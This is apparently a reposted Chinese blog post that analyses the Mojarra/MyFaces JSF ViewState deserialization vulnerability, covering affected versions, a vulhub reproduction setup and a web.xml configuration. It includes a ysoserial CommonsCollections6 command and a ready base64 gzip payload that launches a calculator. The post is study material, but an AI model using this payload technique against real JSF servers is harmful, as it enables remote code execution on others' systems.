Java安全之Mojarra JSF反序列化

Java安全之Mojarra JSF反序列化About JSFJavaServer Faces , 新一代的Java Web应用技术标准 , 吸收了很多Java Servlet以及其他的Web应用框架的特性 。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型 。
其中最常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFaces
JavaServerFaces(JSF)概念在几年前就已经引入 , 现在主要在J2EE中使用
JSF 和类似的 Web 技术之间的区别在于 JSF 使用 ViewStates(除了会话)来存储视图的当前状态(例如 , 当前应该显示视图的哪些部分) 。ViewState 可以存储在server或 上client 。JSF ViewStates 通常作为隐藏字段自动嵌入到 HTML 表单中 , 名称为javax.faces.ViewState 。如果提交表单 , 它们将被发送回服务器 。(有点像.net中的viewstate)
如果 JSF ViewState 配置为位于client隐藏javax.faces.ViewState字段上 , 则包含一个至少经过 Base64 编码的序列化 Java 对象 。
默认字段如下,其中javax.faces.ViewState的值为经过编码/加密处理的序列化对象
<input type="hidden" name="javax.faces.ViewState" id="j_id__v_0:javax.faces.ViewState:1" value="https://www.huyubaike.com/biancheng/rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s" autocomplete="off" />利用条件所有MyFaces版本1.1.7、1.2.8、2.0和更早版本 , 以及Mojarra 1.2.14、2.0.2
JSF2.2之前的规范要求实现加密机制 , 但不要求使用加密机制 。
【Java安全之Mojarra JSF反序列化】Mojarra:ViewState配置为驻留在client (javax.faces.STATE_SAVING_METHOD)
MyFaces: ViewState配置为驻留在clientserver
如果能获取到加密密钥 , 那么即便进行加密 , 依然可以利用 , 默认情况下 , Mojarra 使用AES加密算法HMAC-SHA256验证 ViewState 。
漏洞复现vulhub拉取镜像将代码copy出来
docker-compose up -ddocker cp 568e46fdd891:/usr/src /tmp本地起tomcat搭建环境,vulhub用的jdk7u21链 , 建议本地搭的时候自己添加一个可利用的依赖

Java安全之Mojarra JSF反序列化

文章插图
生成payload命令,记得url编码
java -jar ysoserial-for-woodpecker-0.5.2.jar -g CommonsCollections6 -a "raw_cmd:open -a Calculator" | gzip | base64H4sIAL4abWMAA5WUTWjUQBTHX5Kuta3S7RZKQcQetdjEQw/VPWitFhe2VWyR4l6c7s7uppsvJ5NttoqgoAW99LC1iKA99GYVxIMieCgePIgFvSh6EUHwoKAnj/om2W2zftXmkEwy8/+99/5vMstfIOYy6JgiZaJ6XDfUY8QtjlH++Mjl+euPHvYrAL4zvQ0A5IOHQFwSru+3WUElDskWqZq1TdO2XHwaBs1yXYxLtFImhkfVcZ3mRohz1OKscvXuq5v7V3a9k0FOg4JLOCTSIrBmEKugHZ+cQnkSp0zicGgPp0ROGhKSPn5T8raN0Xs3iI56NU1mKiizPlYv3arEqwpIaWjOkyy3Gcbdm0aEFiK0GkKLILRxRiw3bzOTMoyMMQ9sEDPvWYLtqkNFols0FwHse7bweffMQpMMUga265EZl0NfZnOpeKwm+VcyUcmTU73f3vR335BFI7F9ot3J/y4G3zixeAQ4UZ7rGJTvV2XhaIteX3EWLoDiO+X6XhItVU96FtdNCuvX5rxMWWW7RFkk+uynH6Vz51cHZFAyENMHWQE97Mz8aRu16SOUF+3cKDFp404b40y3CskMLjlBGDHHKw5FTCKKGTKI64Z+1/BhSTX83OrE7bi7x6i7KnNoLVBeKxhFiagohN3pen3v+YvTa50ADi2oCbP0hIE7BAktjK9Lw1wXvy4NzCQfHA6k5WCpK+6dgaxbyJy1IXK36IFzf4OGRTS0JYB2/wKV0BTboVZPH+kZIkbWMwj2hUMT9Wl2DS6JQU8gbXcb+p+yOC1QlviwuPT94iw2TUpBLDgY/IZ8Rj1zkrIry/M726rvr9X9kX4/mPCPjjW/XXnadealAvIwtBo2yQ0Hf3UKWniRUbdoGznfqZ1VML0Vb/GgRN//CQ5kWPztBAAA
Java安全之Mojarra JSF反序列化

文章插图
漏洞分析Web.xml配置 , p牛的环境中是没有加密的 , 加密的环境后面再说
<servlet><servlet-name>Faces Servlet</servlet-name><servlet-class>javax.faces.webapp.FacesServlet</servlet-class><load-on-startup>1</load-on-startup></servlet><!-- Map these files with JSF --><servlet-mapping><servlet-name>Faces Servlet</servlet-name><url-pattern>/faces/*</url-pattern></servlet-mapping><servlet-mapping><servlet-name>Faces Servlet</servlet-name><url-pattern>*.jsf</url-pattern></servlet-mapping><servlet-mapping><servlet-name>Faces Servlet</servlet-name><url-pattern>*.faces</url-pattern></servlet-mapping><servlet-mapping><servlet-name>Faces Servlet</servlet-name><url-pattern>*.xhtml</url-pattern></servlet-mapping>

经验总结扩展阅读